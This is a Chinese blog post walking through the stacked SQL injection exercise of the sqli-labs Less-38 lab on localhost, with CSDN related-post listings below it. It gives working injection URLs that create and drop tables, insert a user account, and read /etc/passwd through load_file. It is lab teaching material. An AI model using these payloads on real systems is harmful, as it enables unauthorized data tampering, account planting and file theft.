sqli-labs (less-38)

最新推荐文章于 2023-01-11 02:00:23 发布
最新推荐文章于 2023-01-11 02:00:23 发布
阅读量627 收藏 1
点赞数
分类专栏: sqli-labs 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/114786823
版权

sqli-labs (less-38)

进入38关,输入id=1

http://127.0.0.1/sql1/Less-38/?id=1'


根据错误信息判断闭合方式为’–+,并且为字符型注入

确定回显位置

http://127.0.0.1/sql1/Less-38/?id=-1' union select 1,2,3--+


这里发现这难道跟less-1难道不是一模一样吗,所以这里我们不使用union注入,我们使用另一种注入方式:堆叠注入

堆叠注入攻击

堆叠查询注入攻击可以执行多条语句,多语句之间以分号隔开。堆叠查询注入就是利用这个特点,在第二个SQL语句中构造自己的要执行的语句
新建一个表select * from users;create table A like users;
删除创建的A表select * from users;drop table test;
查询数据select * from users;select B,C,D;
加载文件select * from users;select load_file('/etc/passwd');
增加一条数据select * from users;insert into users values(18,'zhong','zhong');

在security库下增加一个表

http://127.0.0.1/sql1/Less-38/?id=1'; create table test like users;–+


没有任何反应,我们进入数据库看看我们的表是否创建成功

删除test表

http://127.0.0.1/sql1/Less-38/?id=1'; drop table test;–+


成功删除

创建一个新用户

http://127.0.0.1/sql1/Less-38/?id=1'; insert into users values(18,'icepeak','icepeak');–+


创建成功

super 硕
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs学习笔记(十二)less 38-45 堆叠注入
闵行小鱼塘
09-19 474
继续学习sqli-labs,本篇是less 38-45
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
Sqli-labs 堆叠注入篇 (Less38~53)
angry_program的博客
02-15 1312
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 堆叠注入篇对应labs的38~53关: Less-38 字符型堆叠注入 虽然用很常规的方法都可以注入成功,但是并不侧重于注入爆数据; 而是考察堆叠注入: http://localhost:2333/Less-38/index.php ?id=0' union select 1...
sqli-Labs————less-38
Fly_鹏程万里
05-20 947
Less-38源代码:<?php error_reporting(0); include("../sql-connections/db-creds.inc"); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-tran...
Sqli-labs less 38
weixin_34062329的博客
08-11 173
Less-38 学习了关于stacked injection的相关知识,我们在本关可以得到直接的运用。 在执行select时的sql语句为:SELECT * FROM users WHERE id='$id' LIMIT 0,1 可以直接构造如下的payload: http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20i...
sqli-labs/Less-38
m0_71299382的博客
11-21 198
sqli-labs第三十八关
sqli-labs-less-38~53
giun的博客
02-16 462
less-38~45主要介绍堆叠注入的方法 less-46~53介绍order by 后的注入 less-38 查看源码,我们可以知道 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 我们使用堆叠注入 http://127.0.0.1/sqli-labs-master/Less-38/?id=1';insert into users va...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
下载 sqli-labs 工程,文件名为 sqli_labs_sqli-for7.zip。将下载好的压缩包解压到 phpstudy 的网站根目录下,例如 D:/phpstudy_pro/WWW/。文件夹名字可以自定义,但是要跟 phpstudy 中指定的域名一致,这个就是后面...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
Sqli-labs之Less:38-41
m0_46315342的博客
06-04 262
                                          &nbs...
基于Sqli-Labs靶场的SQL注入-38~45关
Joker
01-11 790
这一篇博客我主要讲了堆叠注入,包括堆叠注入原理、注入条件、注入方法等。堆叠注入的前提条件多,可以实际应用的场景较少。但是只要能够进行堆叠注入,就可以对后台数据库造成很大的伤害。
SQL注入 Less38(堆叠注入)
开心星人的博客
07-28 552
mysqli_fetch_row()函数从结果集中取得一行,并作为枚举数组返回。mysqli_store_result()转移上一次查询返回的结果集。再看这一题,可以和Less1一样,用union注入,可以用来查询数据。所以页面只展示第一条查询的结果。所以我们这里用堆叠注入是查不出数据的,但是。这里我用堆叠注入试了试几个payload。...
Less-38-41(堆叠注入)
老司机开代码的博客
08-04 375
文章目录1. 原理2. 题目分析3. 注入过程4. Less39 1. 原理 SQL语句以;作为一个结束标记。 如图,在执行数据库命令的时候,是支持将多个SQL语句放在一行执行,以;进行分割的。 2. 题目分析 首先看一下题目的意思:stacked query injection String 告诉我们考察的内容是堆叠查询注入。 通过?id=1'判断这个参数是由单引号包裹。 通过?id=0' union select 1,2,3 and 1=1; --+判断出来,这道题貌似没有什么过滤;和Less1几
Sqli-labs 复习 Less38-45 堆叠注入
kevinhanser
08-12 975
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 堆叠注入 原理简介 堆叠注入简介 Stacked injections: 堆叠注入。从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样...
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 693
本文记录 SQL 注入的学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
Sqllibs-less38-45-堆叠注入
Xor0ne
07-14 401
38、less38-stacked Query 38.1、注入分析 由源代码可以发现,闭合方式为单引号,且会输出数据库的报错信息,并且有数据库信息回显。这一关可以不需要使用堆叠注入,类似于平常的注入也可以,如下,使用的就是最简单的union注入。 http://192.168.10.208:8081/sqli-labs-master/Less-38/?id=0%27union select 1,database(),@@basedir--+ 利用一下堆叠注入的原理,我们可以插入数据。 http://1
sqli-labs-less1
最新发布
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码字段。攻击者可以通过在输入框中输入特定的字符串来尝试绕过认证。 如果您想深入学习SQL注入攻击技术,sqli-labs-less1可能是一个很好的练习平台。但请注意,这个平台是为了学术目的而设计的,不要在未授权的情况下尝试对任何真实的系统进行SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值